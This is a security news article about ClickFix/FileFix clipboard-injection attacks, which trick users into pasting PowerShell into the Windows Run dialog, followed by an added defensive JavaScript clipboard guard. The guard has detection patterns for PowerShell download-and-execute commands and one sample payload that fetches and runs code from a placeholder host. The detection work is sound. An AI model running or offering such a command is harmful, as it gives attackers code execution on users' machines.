Coined initially as “ClickFix” because the social engineering prompts told the user they ought to “fix” a problem with their browser and required the user to click an element, the term is now applied to any similar attack: the user clicks an element, the page populates the victim’s clipboard, and the page instructs the user to paste the malicious code into their device’s terminal. ClickFix is a deceptive social engineering tactic used by threat actors to manipulate unsuspecting users into unwittingly allowing a web page to silently populate the clipboard. ClickFix attacks combine malicious JavaScript, clipboard manipulation, and social engineering to ultimately gain the attacker access from the browser to the host device. These clipboard-based techniques abuse the user's interaction with seemingly legitimate, or even compromised, websites to deliver malicious code. The technique has been seen on both malicious and compromised web pages and has been used by multiple threat groups to gain access to victim machines, ultimately deploying malware and remote access trojans (RATs), including AsyncRAT, Skuld Stealer, Lumma Stealer, DarkGate malware, DanaBot stealer, and more. Like ClickFix, the FileFix attack originates in the browser and relies on social engineering, clipboard injection, and user action to cross the boundary between browser and host.

Ultimately, the attacker is attempting to get a user to unknowingly execute, on the host machine, malicious code gathered from the browser and quietly placed into the user’s clipboard. Upon clicking the fake CAPTCHA, malicious JavaScript updates the user’s clipboard with malicious PowerShell code and prompts the user to paste it into the Windows Run dialog. The full data copied to the user’s clipboard is a malicious PowerShell command ending in a comment containing a file path. If the social engineering tactic had been successful and no technical controls had been in place, the user would have unknowingly executed malicious PowerShell code. This kicks off a series of downloads, de-obfuscation, assembly of malware on the host machine, and setting up persistence in the user’s Run registry key, enabling the malware to persist on the compromised device and run each time the user logs in to their computer account. When left undeterred by technical defenses, these seemingly simple clipboard attacks can escalate into full-system compromise, giving threat actors remote control, access to sensitive data, and persistent footholds that are difficult to detect and even harder to remove.

In the case described here, the user had clicked on the prompt, allowing the page to populate the clipboard (with malicious PowerShell) and instructing the user to paste it into the device’s terminal. Once the user clicks the fake CAPTCHA, the page silently populates the user’s clipboard with malicious code. However, Keep Aware identified, blocked, and warned the user of the suspicious commands the page attempted to populate the clipboard with, effectively preventing device compromise. Browser security solutions like Keep Aware detect clipboard population attempts in real time and intercept suspicious code before it ever reaches the host device. By monitoring clipboard access patterns, flagging suspicious web pages, and disrupting lateral movement techniques like ClickFix, Keep Aware empowers organizations to shut down attacks before they ever leave the browser and reach the host.
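As an added example (not Keep Aware's code and not from the article), the following JavaScript shows the kind of browser-side clipboard guard the incident describes: it inspects text a page tries to place on the clipboard and blocks ClickFix-style PowerShell commands before they reach the user. The indicator list, the two-hit threshold and the two sample strings are constructed assumptions.

```javascript
// Added example, not Keep Aware's or the article's code: inspect text a page
// tries to put on the clipboard and block ClickFix-style PowerShell payloads.
// The indicator list is an assumption based on the behaviour described above.
const CLICKFIX_INDICATORS = [
  { name: 'powershell-launch', re: /\bpowershell(\.exe)?\b/i },
  { name: 'hidden-window', re: /-w(indowstyle)?\s+hidden\b/i },
  { name: 'encoded-command', re: /-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}/i },
  { name: 'download-exec', re: /\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b/i },
  // A command that ends in a comment containing a file path, as in the incident above.
  { name: 'trailing-comment-with-path', re: /#[^\n]*([A-Za-z]:\\|\\\\|\/[\w.-]+\/)[^\n]*$/ },
];

// Returns the matched indicator names; two or more hits mark the payload as a
// command meant for a terminal rather than ordinary copied text.
function inspectClipboardPayload(text) {
  const hits = CLICKFIX_INDICATORS.filter(i => i.re.test(text)).map(i => i.name);
  return { suspicious: hits.length >= 2, hits };
}

// Browser-side guard: wraps the two ways a page writes the clipboard
// (navigator.clipboard.writeText and clipboardData.setData inside a copy
// handler) so the payload is inspected before it reaches the user.
// Does nothing outside a browser, so the module can also be loaded in Node.
function installClipboardGuard(onBlock = (v) => console.warn('blocked clipboard write', v.hits)) {
  if (typeof navigator === 'undefined' || typeof DataTransfer === 'undefined') return false;
  if (navigator.clipboard && typeof navigator.clipboard.writeText === 'function') {
    const origWrite = navigator.clipboard.writeText.bind(navigator.clipboard);
    navigator.clipboard.writeText = (text) => {
      const verdict = inspectClipboardPayload(String(text));
      if (verdict.suspicious) { onBlock(verdict); return Promise.reject(new Error('clipboard write blocked')); }
      return origWrite(text);
    };
  }
  const origSetData = DataTransfer.prototype.setData;
  DataTransfer.prototype.setData = function (type, data) {
    const verdict = /^text\/plain$/i.test(type) ? inspectClipboardPayload(String(data)) : null;
    if (verdict && verdict.suspicious) { onBlock(verdict); return; } // leave the clipboard untouched
    return origSetData.call(this, type, data);
  };
  return true;
}

// Constructed samples: ordinary copied text versus a ClickFix-style payload
// (placeholder host, nothing is fetched).
const BENIGN_SAMPLE = 'Order 4821 has shipped and should arrive on Thursday.';
const SUSPICIOUS_SAMPLE =
  'powershell -w hidden -c "iwr http://example.invalid/a | iex" # C:\\Users\\Public\\fix.txt';
```

In a browser extension the guard would be injected into every page at document start; the same inspectClipboardPayload heuristic can also be run server-side over clipboard-write telemetry.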
This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 31 Jul 2025 14:20:29 +0000